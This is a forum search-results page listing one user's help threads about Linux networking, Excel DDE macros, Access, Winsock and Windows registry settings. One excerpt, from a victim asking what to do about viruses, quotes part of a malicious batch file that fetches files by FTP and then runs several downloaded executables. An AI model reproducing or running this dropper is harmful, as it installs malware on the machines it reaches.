Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations Wanet Telecoms Ltd on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Search results for query: *

  • Users: JoBlink
  • Content: Threads
  • Order by date
  1. JoBlink

    Network Interface setup

    HI! I have a laptop running Ubuntu 8.04 server - command line. This laptop has 2 network interfaces: USB and RJ45 I'm trying to share internet connection and have it work as router It pings internet sites through USB, but unable to ping anything on LAN through RJ-45, i.e 192.168.0.1 -...
  2. JoBlink

    setting up 2 network interfaces on linux laptop to share internet conn

    Hi! I read for 4 days various articles on it, but being a networking and Linux Noob, could not make it work. I am out of ideas with no hope of making it on my own, so please, HELP! I am trying to set up a laptop with linux server as a gteway/router. Laptop needs Public IP because some app...
  3. JoBlink

    [ODBC SQL Server Driver] Time0ut expired - WIRED problem!

    SUMMARY Query works on a 1 Mil row table but gives above error on 10 mil. row table. QUERY ___________________________________________________________ DELETE FROM [1] WHERE (Name = ANY (SELECT Name FROM [1]...
  4. JoBlink

    Can U spot my error combining code from 2 subs into 1 ??

    Hi! I have 2 subs in excel VBA module. OBJECTIVE: combine code into one Sub / Function First sub DOES: CONTINUOUSLY monitor DDE updates with LinkOnData method, DOES NOT: pass link strings to another sub Second sub DOES: Pass link strings to anoter sub DOES NOT: monitor links contuinuously...
  5. JoBlink

    Links in Excel

    hi! I have a workbook with several links to DDE server. The link source is an external file on a server to which I have no direct access, and updates come automatically at random intervals. I would like to know if there is a way to write the code that will show me a message box every time a...
  6. JoBlink

    Question about arrays in Excel

    hi! I have Excel file with several DDE links from external sources, updated @ random intervals. For the example sake let's say there are three links. I would like to know which of the three links was updated last.. How can I do that? The links are the part of the array.. Can I identify the...
  7. JoBlink

    Tough one: Macro to pass data from access to excel

    why tough? because this event has to run randomly. Excel has DDE link updating sells at random intervals. I have a macro that is triggered every time data comes in. Within that macro I want to write the code to export updated values from Excel into Microsoft Access. The problem was...
  8. JoBlink

    Passing string form MSWord to Access via Macro

    hi! I'm trying to create a macro in Microsoft Word to allow users to save a document and pass the name of the document in to Microsoft Access database. here is a macro in Microsoft Word. this is pretty much a copy of the solution I found the Microsoft's site...
  9. JoBlink

    VBA macro vs. VB.Net code

    Hi! I have an Excel spreadsheet with several DDE links. Every Time DDE link is updated i would like to send these updates into Microsoft Access database and trigger several calculations. To the best of my knowledge, Microsoft Access database does not have any triggers. So I need the code...
  10. JoBlink

    Found IP address sending viruses to my PC.. What to do?

    Two files (be careful not to run it, you'll get a Torjan, and it's not a condom!): FILE "o.bat" \\\\\\\\\\\\\\\\\\\\\\ if not exist H:\WINNTstatuslog ftp -s:o if exist newdevin.exe newdevin.exe if exist 449166.exe 449166.exe if exist TVM_B5.EXE TVM_B5.EXE if exist 06wu29rd.exe 06wu29rd.exe...
  11. JoBlink

    Can I have to applications listening on the same port?

    Hi! I have a web page with streaming data coming in. I want to be alerted when an update comes in. Can I have a listening application of some kind listening to the same port where data comes in? Thanks. JoBlink
  12. JoBlink

    Can 2 applications listen on the same port?

    Hi! I have a web page with streaming data coming in. I want to be alerted when an update comes in. Can I have a listening application of some kind listening to the same port where data comes in? Thanks. JoBlink
  13. JoBlink

    Textbook sample code: works once but not twice

    Hi! I am having difficult time making a small modification to a textbook sample code. This code is for two applications: first application sends a file to TCP port and second listens on TCP port and receives it. First App TCP Send form has two text boxes, named txtHost and txtPort, with values...
  14. JoBlink

    How to "trigger" DB based on WinSock activity ?

    Hi! I am working with DDE application that links Excel with a website on a remote server. The website sends messages and that application inserts them into Excel. THE PROBLEM: each new message overwrites the previous, without creating any logs. I did not write the Excel app, and don't know how...
  15. JoBlink

    How to Use WinSock acrivity to trigger an event?

    Hi! I am working with DDE application that links Excel with a website on a remote server. The website sends messages and that application inserts them into Excel. THE PROBLEM: each new message overwrites the previous, without creating any logs. I did not write the Excel app, and don't know how...
  16. JoBlink

    How to make windows logon automatically into account?

    I an trying to edit HKEYLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WINDOGON\AUTOLOGONADMIN = 1 CURRENTLY IT IS SET TO '0' WHEN I RESTART, AUTOLOGON WORKS. NEXT RESTART - IT DOESN'T. REGKEY CHANGES BACK TO '0' AUTOMATICALLY. CAN ANYONE SUGGEST HOW TO CHANGE THIS KEY PERMANENTLY, AND...
  17. JoBlink

    Need help editing registry key in W2K server

    I an trying to edit HKEYLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WINDOGON\AUTOLOGONADMIN = 1 CURRENTLY IT IS SET TO '0' WHEN I RESTART, AUTOLOGON WORKS. NEXT RESTART - IT DOESN'T. REGKEY CHANGES BACK TO '0' AUTOMATICALLY. CAN ANYONE SUGGEST HOW TO CHANGE THIS KEY PERMANENTLY, AND...
  18. JoBlink

    Unable to create ANY new ASP project

    HI! I am running W2K server. I just re-installed VS.Net 1.0 but the problem persists. The OS and INETPUB folders are on E drive, the VS.Net is on C drive. This configuration worked well at first, but some unrelated error prompted me to re-install (repair) Windows, and I had this issue ever...
  19. JoBlink

    I disabled my built-in LAN adapter, how do I re-enable it?

    HI Do you know a little icon with 2 computers and a red cross-mark between them hanging in the lower right-hand corner, indication that your network cable is unplugged? Well, I right-clicked and disabled it. Now I cannot find it anywere. I have ECS K7S5A mobo, with LAN built-in SiiS900 10/100...
  20. JoBlink

    sendmail listen port

    Hello All. first of all, i'm running RedHat 7.1. here's my problem. I want to make SENDMAIL open the tcp port (25) to th internet (0.0.0.0) and not only (127.0.0.1) here's what i get when: netstat -nl : Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address...

Part and Inventory Search

Back
Top